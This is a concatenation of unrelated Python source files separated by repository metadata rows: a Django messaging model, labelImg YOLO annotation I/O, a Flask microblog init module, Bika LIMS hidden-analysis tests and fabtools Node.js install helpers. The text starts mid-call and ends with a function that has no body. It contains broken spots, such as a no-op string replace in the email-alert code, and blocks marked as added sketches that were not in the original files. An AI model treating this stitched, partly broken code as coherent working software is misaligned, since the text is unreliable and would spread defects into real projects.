message_type=Message.STORED,
sender=sender,
text=text,
)
#recipients are parent's recipients + sender
#creator of response gets memo in the "read" status
recipients = set(parent.recipients.all())
if sender != parent.sender:
senders_group = get_personal_group(parent.sender)
parent.add_recipients([senders_group])
recipients.add(senders_group)
message.add_recipients(recipients)
#add author of the parent as a recipient to parent
#update headline
message.root.headline = text[:MAX_HEADLINE_LENGTH]
#mark last active timestamp for the root message
message.root.last_active_at = datetime.datetime.now()
#update senders info - stuff that is shown in the thread heading
message.root.update_senders_info()
#unarchive the thread for all recipients
message.root.unarchive()
message.send_email_alert()
return message
class Message(models.Model):
"""the message model allowing users to send
messages to other users and groups, via
personal groups.
"""
STORED = 0
TEMPORARY = 1
ONE_TIME = 2
MESSAGE_TYPE_CHOICES = (
(STORED, 'email-like message, stored in the inbox'),
(ONE_TIME, 'will be shown just once'),
(TEMPORARY, 'will be shown until certain time')
)
message_type = models.SmallIntegerField(
choices=MESSAGE_TYPE_CHOICES,
default=STORED,
)
sender = models.ForeignKey(User, related_name='group_messaging_sent_messages')
senders_info = models.CharField(
max_length=MAX_SENDERS_INFO_LENGTH,
default=''
)#comma-separated list of a few names
recipients = models.ManyToManyField(Group)
root = models.ForeignKey(
'self', null=True,
blank=True, related_name='descendants'
)
parent = models.ForeignKey(
'self', null=True,
blank=True, related_name='children'
)
headline = models.CharField(max_length=MAX_HEADLINE_LENGTH)
text = models.TextField(
null=True, blank=True,
help_text='source text for the message, e.g. in markdown format'
)
html = models.TextField(
null=True, blank=True,
help_text='rendered html of the message'
)
sent_at = models.DateTimeField(auto_now_add=True)
last_active_at = models.DateTimeField(auto_now_add=True)
active_until = models.DateTimeField(blank=True, null=True)
objects = MessageManager()
def add_recipient_names_to_senders_info(self, recipient_groups):
names = get_recipient_names(recipient_groups)
old_names = set(self.senders_info.split(','))
names |= old_names
self.senders_info = ','.join(names)
def add_recipients(self, recipients):
"""adds recipients to the message
and updates the sender lists for all recipients
todo: sender lists may be updated in a lazy way - per user
"""
self.recipients.add(*recipients)
for recipient in recipients:
sender_list, created = SenderList.objects.get_or_create(recipient=recipient)
sender_list.senders.add(self.sender)
def get_absolute_url(self, user=None):
"""returns absolute url to the thread"""
assert(user != None)
settings = django_settings.GROUP_MESSAGING
func_path = settings['BASE_URL_GETTER_FUNCTION']
path_bits = func_path.split('.')
url_getter = getattr(
import_module('.'.join(path_bits[:-1])),
path_bits[-1]
)
params = copy.copy(settings['BASE_URL_PARAMS'])
params['thread_id'] = self.id
url = url_getter(user) + '?' + urllib.urlencode(params)
#if include_domain_name: #don't need this b/c
# site = Site.objects.get_current()
# url = 'http://' + site.domain + url
return url
def get_email_subject_line(self):
"""forms subject line based on the root message
and prepends 'Re': if message is non-root
"""
subject = self.get_root_message().text[:MAX_SUBJECT_LINE_LENGTH]
if self.root:
subject = _('Re: ') + subject
return subject
def get_root_message(self):
"""returns root message or self
if current message is root
"""
return self.root or self
def get_recipients_users(self):
"""returns query set of users"""
groups = self.recipients.all()
return User.objects.filter(
groups__in=groups
).exclude(
id=self.sender.id
).distinct()
def get_timeline(self):
"""returns ordered query set of messages in the thread
with the newest first"""
root = self.get_root_message()
root_qs = Message.objects.filter(id=root.id)
return (root.descendants.all() | root_qs).order_by('-sent_at')
def send_email_alert(self):
"""signal handler for the message post-save"""
root_message = self.get_root_message()
data = {'messages': self.get_timeline()}
template = get_template('group_messaging/email_alert.html')
body_text = template.render(data)
subject = self.get_email_subject_line()
for user in self.get_recipients_users():
#todo change url scheme so that all users have the same
#urls within their personal areas of the user profile
#so that we don't need to have loops like this one
thread_url = root_message.get_absolute_url(user)
thread_url = thread_url.replace('&', '&')
#in the template we have a placeholder to be replaced like this:
body_text = body_text.replace('THREAD_URL_HOLE', thread_url)
send_mail(
subject,
body_text,
django_settings.DEFAULT_FROM_EMAIL,
[user.email,],
)
def update_senders_info(self):
"""update the contributors info,
meant to be used on a root message only
"""
senders_names = self.senders_info.split(',')
if self.sender.username in senders_names:
senders_names.remove(self.sender.username)
senders_names.insert(0, self.sender.username)
self.senders_info = (','.join(senders_names))[:64]
self.save()
def unarchive(self, user=None):
"""unarchive message for all recipients"""
archived_filter = {'status': MessageMemo.ARCHIVED}
if user:
archived_filter['user'] = user
memos = self.memos.filter(**archived_filter)
memos.update(status=MessageMemo.SEEN)
def set_status_for_user(self, status, user):
"""set specific status to the message for the user"""
memo, created = MessageMemo.objects.get_or_create(user=user, message=self)
memo.status = status
memo.save()
def archive(self, user):
"""mark message as archived"""
self.set_status_for_user(MessageMemo.ARCHIVED, user)
def mark_as_seen(self, user):
"""mark message as seen"""
self.set_status_for_user(MessageMemo.SEEN, user)
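# --- Illustrative usage sketch (added; not part of the original module) ---
# Shows how the pieces above fit together: a private message is sent to a
# single user via that user's personal group. Both users are assumed to
# already have personal groups (see create_personal_group() above).
def send_private_message_example(sender, recipient, text):
    """Sketch only: create a one-to-one thread and return the root message"""
    personal_group = get_personal_group(recipient)
    return Message.objects.create_thread(
        sender=sender,
        recipients=[personal_group],
        text=text
    )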
| gpl-3.0 | -6,098,108,620,845,167,000 | 34.251142 | 88 | 0.608549 | false | 4.15277 | false | false | false |
tzutalin/labelImg | libs/yolo_io.py | 1 | 4998 | #!/usr/bin/env python
# -*- coding: utf8 -*-
import sys
import os
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
from lxml import etree
import codecs
from libs.constants import DEFAULT_ENCODING
TXT_EXT = '.txt'
ENCODE_METHOD = DEFAULT_ENCODING
class YOLOWriter:
def __init__(self, folder_name, filename, img_size, database_src='Unknown', local_img_path=None):
self.folder_name = folder_name
self.filename = filename
self.database_src = database_src
self.img_size = img_size
self.box_list = []
self.local_img_path = local_img_path
self.verified = False
def add_bnd_box(self, x_min, y_min, x_max, y_max, name, difficult):
bnd_box = {'xmin': x_min, 'ymin': y_min, 'xmax': x_max, 'ymax': y_max}
bnd_box['name'] = name
bnd_box['difficult'] = difficult
self.box_list.append(bnd_box)
def bnd_box_to_yolo_line(self, box, class_list=[]):
x_min = box['xmin']
x_max = box['xmax']
y_min = box['ymin']
y_max = box['ymax']
x_center = float((x_min + x_max)) / 2 / self.img_size[1]
y_center = float((y_min + y_max)) / 2 / self.img_size[0]
w = float((x_max - x_min)) / self.img_size[1]
h = float((y_max - y_min)) / self.img_size[0]
# PR387
box_name = box['name']
if box_name not in class_list:
class_list.append(box_name)
class_index = class_list.index(box_name)
return class_index, x_center, y_center, w, h
def save(self, class_list=[], target_file=None):
out_file = None # Update yolo .txt
out_class_file = None # Update class list .txt
if target_file is None:
out_file = open(
self.filename + TXT_EXT, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(self.filename)), "classes.txt")
out_class_file = open(classes_file, 'w')
else:
out_file = codecs.open(target_file, 'w', encoding=ENCODE_METHOD)
classes_file = os.path.join(os.path.dirname(os.path.abspath(target_file)), "classes.txt")
out_class_file = open(classes_file, 'w')
for box in self.box_list:
class_index, x_center, y_center, w, h = self.bnd_box_to_yolo_line(box, class_list)
# print (classIndex, x_center, y_center, w, h)
out_file.write("%d %.6f %.6f %.6f %.6f\n" % (class_index, x_center, y_center, w, h))
# print (classList)
# print (out_class_file)
for c in class_list:
out_class_file.write(c+'\n')
out_class_file.close()
out_file.close()
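# --- Illustrative usage sketch (added; file names, image size and the box
# coordinates are made-up values) ---
# Write a single annotation in YOLO format; img_size is (height, width, depth)
# and the difficult flag is discarded in the .txt output.
def _example_write_yolo():
    writer = YOLOWriter('images', 'images/dog', (480, 640, 3),
                        local_img_path='images/dog.jpg')
    writer.add_bnd_box(48, 240, 195, 371, 'dog', False)
    writer.save(class_list=['dog'], target_file='images/dog.txt')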
class YoloReader:
def __init__(self, file_path, image, class_list_path=None):
# shapes type:
        # [label, [(x1,y1), (x2,y2), (x3,y3), (x4,y4)], color, color, difficult]
self.shapes = []
self.file_path = file_path
if class_list_path is None:
dir_path = os.path.dirname(os.path.realpath(self.file_path))
self.class_list_path = os.path.join(dir_path, "classes.txt")
else:
self.class_list_path = class_list_path
# print (file_path, self.class_list_path)
classes_file = open(self.class_list_path, 'r')
self.classes = classes_file.read().strip('\n').split('\n')
# print (self.classes)
img_size = [image.height(), image.width(),
1 if image.isGrayscale() else 3]
self.img_size = img_size
self.verified = False
# try:
self.parse_yolo_format()
# except:
# pass
def get_shapes(self):
return self.shapes
def add_shape(self, label, x_min, y_min, x_max, y_max, difficult):
points = [(x_min, y_min), (x_max, y_min), (x_max, y_max), (x_min, y_max)]
self.shapes.append((label, points, None, None, difficult))
def yolo_line_to_shape(self, class_index, x_center, y_center, w, h):
label = self.classes[int(class_index)]
x_min = max(float(x_center) - float(w) / 2, 0)
x_max = min(float(x_center) + float(w) / 2, 1)
y_min = max(float(y_center) - float(h) / 2, 0)
y_max = min(float(y_center) + float(h) / 2, 1)
x_min = round(self.img_size[1] * x_min)
x_max = round(self.img_size[1] * x_max)
y_min = round(self.img_size[0] * y_min)
y_max = round(self.img_size[0] * y_max)
return label, x_min, y_min, x_max, y_max
def parse_yolo_format(self):
bnd_box_file = open(self.file_path, 'r')
for bndBox in bnd_box_file:
class_index, x_center, y_center, w, h = bndBox.strip().split(' ')
label, x_min, y_min, x_max, y_max = self.yolo_line_to_shape(class_index, x_center, y_center, w, h)
# Caveat: difficult flag is discarded when saved as yolo format.
self.add_shape(label, x_min, y_min, x_max, y_max, False)
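# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): the file name,
# image size and box coordinates below are made-up example values.
if __name__ == '__main__':
    writer = YOLOWriter('images', 'img_0001', (480, 640, 3))
    writer.add_bnd_box(10, 20, 100, 200, 'dog', 0)
    writer.add_bnd_box(50, 60, 150, 220, 'cat', 0)
    # Writes img_0001.txt plus a classes.txt file next to it.
    writer.save(class_list=['dog', 'cat'], target_file='img_0001.txt')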
| mit | 1,057,282,036,230,914,300 | 33.232877 | 110 | 0.566026 | false | 3.040146 | false | false | false |
tongxindao/Flask-micblog | Flask-MicroBlog/web/micblog/app/__init__.py | 1 | 1602 | # coding: utf-8
import os
from flask_login import LoginManager
from flask_openid import OpenID
from config import basedir, ADMINS, MAIL_SERVER, MAIL_PORT, MAIL_USERNAME, MAIL_PASSWORD
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from momentjs import momentjs
from flask_babel import Babel, lazy_gettext
from flask.json import JSONEncoder
app = Flask(__name__)
app.config.from_object('config')
db = SQLAlchemy(app)
lm = LoginManager()
lm.init_app(app)
lm.login_view = 'login'
lm.login_message = lazy_gettext('请您先登陆。')
oid = OpenID(app, os.path.join(basedir, 'tmp'))
mail = Mail(app)
babel = Babel(app)
if not app.debug:
import logging
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler('tmp/microblog.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('microblog startup')
app.jinja_env.globals['momentjs'] = momentjs
class CustomJSONEncoder(JSONEncoder):
def default(self, obj):
from speaklater import is_lazy_string
if is_lazy_string(obj):
try:
return unicode(obj) # python 2
except NameError:
return str(obj) # python 3
return super(CustomJSONEncoder, self).default(obj)
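# Registering this encoder lets Flask's JSON responses serialise the lazy
# (Babel) translated strings returned by views instead of raising a TypeError.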
app.json_encoder = CustomJSONEncoder
from app import views, models
| apache-2.0 | 6,041,693,416,205,161,000 | 25.949153 | 119 | 0.709434 | false | 3.449024 | false | false | false |
veroc/Bika-LIMS | bika/lims/tests/test_hiddenanalyses.py | 2 | 17336 | from bika.lims.content.analysis import Analysis
from bika.lims.testing import BIKA_FUNCTIONAL_TESTING
from bika.lims.tests.base import BikaFunctionalTestCase
from bika.lims.utils.analysisrequest import create_analysisrequest
from bika.lims.workflow import doActionFor
from plone.app.testing import login, logout
from plone.app.testing import TEST_USER_NAME
import unittest
try:
import unittest2 as unittest
except ImportError: # Python 2.7
import unittest
class TestHiddenAnalyses(BikaFunctionalTestCase):
layer = BIKA_FUNCTIONAL_TESTING
def setUp(self):
super(TestHiddenAnalyses, self).setUp()
login(self.portal, TEST_USER_NAME)
servs = self.portal.bika_setup.bika_analysisservices
# analysis-service-3: Calcium (Ca)
# analysis-service-6: Cooper (Cu)
# analysis-service-7: Iron (Fe)
self.services = [servs['analysisservice-3'],
servs['analysisservice-6'],
servs['analysisservice-7']]
# Calcium - Hidden not set
# Copper - Hidden set to False
self.services[1].setHidden(False)
# Iron - Hidden set to True
self.services[2].setHidden(True)
profs = self.portal.bika_setup.bika_analysisprofiles
# analysisprofile-1: Trace Metals
self.analysisprofile = profs['analysisprofile-1']
artemp = self.portal.bika_setup.bika_artemplates
# artemplate-2: Bruma Metals
self.artemplate = artemp['artemplate-2']
def tearDown(self):
# Restore
for s in self.services:
s.setHidden(False)
self.analysisprofile.setAnalysisServicesSettings([])
self.artemplate.setAnalysisServicesSettings([])
logout()
super(TestHiddenAnalyses, self).tearDown()
def test_service_hidden_service(self):
service = self.services[1]
uid = service.UID()
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(False)
self.assertFalse(service.getHidden())
self.assertFalse(service.Schema().getField('Hidden').get(service))
service.setHidden(True)
self.assertTrue(service.getHidden())
self.assertTrue(service.Schema().getField('Hidden').get(service))
# Restore
service.setHidden(False)
def test_service_hidden_profile(self):
# Profile
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in profile
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Cooper in profile
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in profile
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.analysisprofile.setAnalysisServicesSettings(sets)
self.assertTrue(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.analysisprofile.getAnalysisServiceSettings(uid))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
def test_service_hidden_artemplate(self):
# Template
# For Calcium (unset)
uid = self.services[0].UID();
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in template
uid = self.services[0].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Cooper in template
uid = self.services[1].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Modify visibility for Iron in template
uid = self.services[2].UID();
sets = [{'uid': uid}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertFalse(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
self.artemplate.setAnalysisServicesSettings(sets)
self.assertTrue(self.artemplate.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_service_hidden_analysisrequest(self):
# Input results
# Client: Happy Hills
# SampleType: Apple Pulp
# Contact: Rita Mohale
# Analyses: [Calcium, Copper, Iron]
client = self.portal.clients['client-1']
sampletype = self.portal.bika_setup.bika_sampletypes['sampletype-1']
request = {}
services = [s.UID() for s in self.services]
values = {'Client': client.UID(),
'Contact': client.getContacts()[0].UID(),
'SamplingDate': '2015-01-01',
'SampleType': sampletype.UID()}
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.isAnalysisServiceHidden(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.isAnalysisServiceHidden(services[1]))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
self.assertTrue(ar.isAnalysisServiceHidden(services[2]))
# For Calcium (unset)
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(self.analysisprofile.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in self.artemplate.getAnalysisServiceSettings(uid))
# For Copper (False)
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# For Iron (True)
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# Modify visibility for Calcium in AR
uid = self.services[0].UID();
sets = [{'uid': uid}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': False}]
ar.setAnalysisServicesSettings(sets)
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
sets = [{'uid': uid, 'hidden': True}]
ar.setAnalysisServicesSettings(sets)
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(uid))
ar.setAnalysisServicesSettings([])
# AR with profile with no changes
values['Profiles'] = self.analysisprofile.UID()
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with template with no changes
values['Template'] = self.artemplate
del values['Profiles']
ar = create_analysisrequest(client, request, values, services)
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[0]))
self.assertFalse(ar.getAnalysisServiceSettings(services[1]).get('hidden'))
self.assertFalse(ar.getAnalysisServiceSettings(services[2]).get('hidden'))
uid = self.services[0].UID()
self.assertFalse(self.services[0].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[1].UID()
self.assertFalse(self.services[1].getHidden())
self.assertFalse(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
uid = self.services[2].UID()
self.assertTrue(self.services[2].getHidden())
self.assertTrue(ar.isAnalysisServiceHidden(uid))
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(uid))
# AR with profile, with changes
values['Profiles'] = self.analysisprofile.UID()
del values['Template']
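        # Expected-outcome matrix: one row per service (Hidden unset / False / True)
        # and one column per profile override (j=0 -> hidden=False, j=1 -> hidden=True,
        # j=2 -> no override).  A negative entry means no 'hidden' key should appear
        # in the AR's per-service settings; magnitude 1 -> analysis hidden, 2 -> visible.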
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.analysisprofile.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.analysisprofile.setAnalysisServicesSettings([])
# AR with template, with changes
values['Template'] = self.artemplate.UID()
del values['Profiles']
matrix = [[2, 1,-2], # AS = Not set
[2, 1,-2], # AS = False
[2, 1,-1]]
for i in range(len(matrix)):
sets = {'uid': services[i]}
opts = [0, 1, 2]
for j in opts:
if j == 0:
sets['hidden'] = False
elif j == 1:
sets['hidden'] = True
else:
del sets['hidden']
self.artemplate.setAnalysisServicesSettings(sets)
ar = create_analysisrequest(client, request, values, services)
res = matrix[i][j]
if res < 0:
self.assertFalse('hidden' in ar.getAnalysisServiceSettings(services[i]))
else:
# testing tests
self.assertTrue('hidden' in ar.getAnalysisServiceSettings(services[i]))
if abs(res) == 1:
self.assertTrue(ar.isAnalysisServiceHidden(services[i]))
elif abs(res) == 2:
self.assertFalse(ar.isAnalysisServiceHidden(services[i]))
# Restore
self.artemplate.setAnalysisServicesSettings([])
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestHiddenAnalyses))
suite.layer = BIKA_FUNCTIONAL_TESTING
return suite
| agpl-3.0 | 6,423,463,675,719,172,000 | 45.602151 | 92 | 0.65338 | false | 4.186428 | true | false | false |
hagai26/fabtools | fabtools/nodejs.py | 1 | 5616 | """
Node.js
=======
This module provides tools for installing `Node.js`_ and managing
packages using `npm`_.
.. note: the ``simplejson`` module is required on Python 2.5
.. _Node.js: http://nodejs.org/
.. _npm: http://npmjs.org/
"""
try:
import json
except ImportError:
import simplejson as json
from fabric.api import abort, cd, hide, run, settings
from fabtools.system import cpus, distrib_family
from fabtools.utils import run_as_root
DEFAULT_VERSION = '0.10.13'
def install_from_source(version=DEFAULT_VERSION, checkinstall=False, dist_num=None):
"""
Install Node JS from source.
If *checkinstall* is ``True``, a distribution package will be built.
set dist_num to set make -j value
::
import fabtools
# Install Node.js
fabtools.nodejs.install_nodejs()
.. note:: This function may not work for old versions of Node.js.
"""
from fabtools.require.deb import packages as require_deb_packages
from fabtools.require.rpm import packages as require_rpm_packages
from fabtools.require import file as require_file
family = distrib_family()
if family == 'debian':
packages = [
'build-essential',
'libssl-dev',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_deb_packages(packages)
elif family == 'redhat':
packages = [
'gcc',
'gcc-c++',
'make',
'openssl-devel',
'python',
]
if checkinstall:
packages.append('checkinstall')
require_rpm_packages(packages)
filename = 'node-v%s.tar.gz' % version
foldername = filename[0:-7]
require_file(url='http://nodejs.org/dist/v%(version)s/%(filename)s' % {
'version': version,
'filename': filename,
})
run('tar -xzf %s' % filename)
cpus_num = None
if dist_num:
if dist_num > 0:
cpus_num = dist_num
else:
abort("dist_num should be positive")
else:
cpus_num = cpus() + 1
if cpus_num:
with cd(foldername):
run('./configure')
run('make -j%d' % cpus_num)
if checkinstall:
                run_as_root('checkinstall -y --pkgname=nodejs --pkgversion=%(version)s '
                            '--showinstall=no make install' % locals())
else:
run_as_root('make install')
run('rm -rf %(filename)s %(foldername)s' % locals())
def version(node='node'):
"""
Get the version of Node.js currently installed.
Returns ``None`` if it is not installed.
"""
with settings(hide('running', 'stdout', 'warnings'), warn_only=True):
res = run('%(node)s --version' % locals())
if res.failed:
return None
else:
return res[1:]
def install_package(package, version=None, local=False, npm='npm'):
"""
Install a Node.js package.
If *local* is ``True``, the package will be installed locally.
::
import fabtools
# Install package globally
fabtools.nodejs.install_package('express')
# Install package locally
fabtools.nodejs.install_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s install -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s install -g %(package)s' % locals())
def install_dependencies(npm='npm'):
"""
Install Node.js package dependencies.
This function calls ``npm install``, which will locally install all
packages specified as dependencies in the ``package.json`` file
found in the current directory.
::
from fabric.api import cd
from fabtools import nodejs
with cd('/path/to/nodejsapp/'):
nodejs.install_dependencies()
"""
run('%(npm)s install' % locals())
def package_version(package, local=False, npm='npm'):
"""
Get the installed version of a Node.js package.
    Returns ``None`` if the package is not installed. If *local* is
``True``, returns the version of the locally installed package.
"""
options = ['--json true', '--silent']
if local:
options.append('-l')
else:
options.append('-g')
options = ' '.join(options)
with hide('running', 'stdout'):
res = run('%(npm)s list %(options)s' % locals())
dependencies = json.loads(res).get('dependencies', {})
pkg_data = dependencies.get(package)
if pkg_data:
return pkg_data['version']
else:
return None
def update_package(package, local=False, npm='npm'):
"""
Update a Node.js package.
If *local* is ``True``, the package will be updated locally.
"""
if local:
run('%(npm)s update -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s update -g %(package)s' % locals())
def uninstall_package(package, version=None, local=False, npm='npm'):
"""
Uninstall a Node.js package.
If *local* is ``True``, the package will be uninstalled locally.
::
import fabtools
# Uninstall package globally
fabtools.nodejs.uninstall_package('express')
# Uninstall package locally
fabtools.nodejs.uninstall_package('underscore', local=False)
"""
if version:
package += '@%s' % version
if local:
run('%(npm)s uninstall -l %(package)s' % locals())
else:
run_as_root('HOME=/root %(npm)s uninstall -g %(package)s' % locals())
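# ---------------------------------------------------------------------------
# Illustrative sketch (not part of fabtools itself): a fabfile task that could
# use the helpers above; 'express' is just an example package name.
def example_setup_node(version=DEFAULT_VERSION):
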